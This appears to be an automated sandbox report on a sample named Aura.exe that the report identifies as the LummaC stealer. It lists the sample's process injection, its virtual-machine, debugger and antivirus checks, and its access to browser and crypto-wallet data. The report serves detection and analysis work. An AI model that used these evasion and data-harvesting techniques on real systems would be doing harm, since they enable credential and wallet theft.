Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Aura.exe	Virustotal: Detection: 51%
Source: Aura.exe	ReversingLabs: Detection: 47%

Source: C:\Users\user\Desktop\Aura.exe

File read: C:\Users\user\Desktop\Aura.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Aura.exe "C:\Users\user\Desktop\Aura.exe"
Source: C:\Users\user\Desktop\Aura.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Aura.exe	Process created: C:\Users\user\Desktop\Aura.exe "C:\Users\user\Desktop\Aura.exe"
Source: C:\Users\user\Desktop\Aura.exe	Process created: C:\Users\user\Desktop\Aura.exe "C:\Users\user\Desktop\Aura.exe"
Source: C:\Users\user\Desktop\Aura.exe	Process created: C:\Users\user\Desktop\Aura.exe "C:\Users\user\Desktop\Aura.exe"
Source: C:\Users\user\Desktop\Aura.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7808 -s 404
Source: C:\Users\user\Desktop\Aura.exe	Process created: C:\Users\user\Desktop\Aura.exe "C:\Users\user\Desktop\Aura.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process created: C:\Users\user\Desktop\Aura.exe "C:\Users\user\Desktop\Aura.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process created: C:\Users\user\Desktop\Aura.exe "C:\Users\user\Desktop\Aura.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Aura.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Aura.exe

Static file information: File size 1374720 > 1048576

Source: Aura.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C4DFCA push ecx; ret	0_2_00C4DFDD
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C204DD push ebx; iretd	2_2_00C204E3
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C204F7 push ebx; iretd	2_2_00C204F9
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C4DFCA push ecx; ret	2_2_00C4DFDD
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C0A775 push es; iretd	2_2_00C0A776

Source: Aura.exe

Static PE information: section name: .text entropy: 7.09207256696417

Source: C:\Users\user\Desktop\Aura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Aura.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Aura.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Aura.exe

Window / User API: threadDelayed 6101

Jump to behavior

Source: C:\Users\user\Desktop\Aura.exe TID: 7924	Thread sleep time: -210000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe TID: 8028	Thread sleep count: 6101 > 30			Jump to behavior

Source: C:\Users\user\Desktop\Aura.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C5FCDE FindFirstFileExW,	0_2_00C5FCDE
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C5FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00C5FD8F
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C5FCDE FindFirstFileExW,	2_2_00C5FCDE
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C5FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00C5FD8F

Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Comms	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Packages	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\CEF	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\.ms-ad	Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Aura.exe, 00000004.00000003.1210324639.0000000001267000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1210182330.0000000001267000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000002.2439712146.000000000122C000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1344787476.0000000001267000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1345469435.0000000001267000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1410794402.0000000001267000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1369150670.0000000001267000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000002.2440191676.000000000126A000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.2052207735.0000000001267000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\Aura.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\Aura.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Aura.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Aura.exe

Code function: 0_2_00BE553B _strlen,GetModuleHandleA,GetProcAddress,VirtualProtect,LdrInitializeThunk,OleDraw,GetModuleHandleA,GetProcAddress,OleDraw,FreeConsole,__fread_nolock,_strlen,_strlen,FreeConsole,__fread_nolock,FreeConsole,__fread_nolock,

0_2_00BE553B

Source: C:\Users\user\Desktop\Aura.exe

Code function: 0_2_00C4DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00C4DC9E

Source: C:\Users\user\Desktop\Aura.exe

Code function: 0_2_00C761B4 mov edi, dword ptr fs:[00000030h]

0_2_00C761B4

Source: C:\Users\user\Desktop\Aura.exe

Code function: 0_2_00C5B71C GetProcessHeap,

0_2_00C5B71C

Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C4D8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00C4D8E2
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C4DC92 SetUnhandledExceptionFilter,	0_2_00C4DC92
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C4DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00C4DC9E
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C55DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00C55DCE
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C4D8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00C4D8E2
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C4DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00C4DC9E
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C55DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00C55DCE

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Aura.exe

Code function: 0_2_00C761B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_00C761B4

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Aura.exe

Memory written: C:\Users\user\Desktop\Aura.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Aura.exe	Process created: C:\Users\user\Desktop\Aura.exe "C:\Users\user\Desktop\Aura.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process created: C:\Users\user\Desktop\Aura.exe "C:\Users\user\Desktop\Aura.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Process created: C:\Users\user\Desktop\Aura.exe "C:\Users\user\Desktop\Aura.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Aura.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00C5F048
Source: C:\Users\user\Desktop\Aura.exe	Code function: EnumSystemLocalesW,	0_2_00C5B007
Source: C:\Users\user\Desktop\Aura.exe	Code function: EnumSystemLocalesW,	0_2_00C5F299
Source: C:\Users\user\Desktop\Aura.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00C5F334
Source: C:\Users\user\Desktop\Aura.exe	Code function: GetLocaleInfoW,	0_2_00C5F5E6
Source: C:\Users\user\Desktop\Aura.exe	Code function: EnumSystemLocalesW,	0_2_00C5F587
Source: C:\Users\user\Desktop\Aura.exe	Code function: EnumSystemLocalesW,	0_2_00C5F6BB
Source: C:\Users\user\Desktop\Aura.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00C5F7AD
Source: C:\Users\user\Desktop\Aura.exe	Code function: GetLocaleInfoW,	0_2_00C5F706
Source: C:\Users\user\Desktop\Aura.exe	Code function: GetLocaleInfoW,	0_2_00C5F8B3
Source: C:\Users\user\Desktop\Aura.exe	Code function: GetLocaleInfoW,	0_2_00C5AB0C
Source: C:\Users\user\Desktop\Aura.exe	Code function: GetLocaleInfoW,	2_2_00C5F8B3
Source: C:\Users\user\Desktop\Aura.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_00C5F048
Source: C:\Users\user\Desktop\Aura.exe	Code function: EnumSystemLocalesW,	2_2_00C5B007
Source: C:\Users\user\Desktop\Aura.exe	Code function: EnumSystemLocalesW,	2_2_00C5F299
Source: C:\Users\user\Desktop\Aura.exe	Code function: GetLocaleInfoW,	2_2_00C5AB0C
Source: C:\Users\user\Desktop\Aura.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_00C5F334
Source: C:\Users\user\Desktop\Aura.exe	Code function: GetLocaleInfoW,	2_2_00C5F5E6
Source: C:\Users\user\Desktop\Aura.exe	Code function: EnumSystemLocalesW,	2_2_00C5F587
Source: C:\Users\user\Desktop\Aura.exe	Code function: EnumSystemLocalesW,	2_2_00C5F6BB
Source: C:\Users\user\Desktop\Aura.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_00C5F7AD
Source: C:\Users\user\Desktop\Aura.exe	Code function: GetLocaleInfoW,	2_2_00C5F706

Source: C:\Users\user\Desktop\Aura.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Aura.exe

Code function: 0_2_00C4E6D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00C4E6D7

Source: C:\Users\user\Desktop\Aura.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Aura.exe, 00000004.00000003.1369076498.00000000012B9000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1373443088.00000000012B9000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1369037885.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000002.2440257595.0000000001279000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1369150670.0000000001267000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1390392632.00000000012B5000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1410776675.00000000012B9000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.2052207735.0000000001267000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1390461085.0000000001278000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.2052418034.0000000001277000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\Aura.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Aura.exe PID: 7880, type: MEMORYSTR
Source: Yara match	File source: 4.2.Aura.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Aura.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2438218367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1257698483.00000000022E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Aura.exe, 00000004.00000002.2440257595.0000000001279000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: Aura.exe, 00000004.00000002.2440257595.0000000001279000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: Aura.exe, 00000004.00000003.1369076498.00000000012B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: om.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"
Source: Aura.exe, 00000004.00000002.2440257595.0000000001279000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Aura.exe, 00000004.00000003.1369076498.00000000012B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: um","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[
Source: Aura.exe, 00000004.00000003.1369076498.00000000012B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: um","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[
Source: Aura.exe, 00000004.00000003.1369076498.00000000012B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 00000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallet
Source: Aura.exe, 00000004.00000003.1344787476.0000000001263000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Aura.exe, 00000004.00000003.1369076498.00000000012B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 00000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallet

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
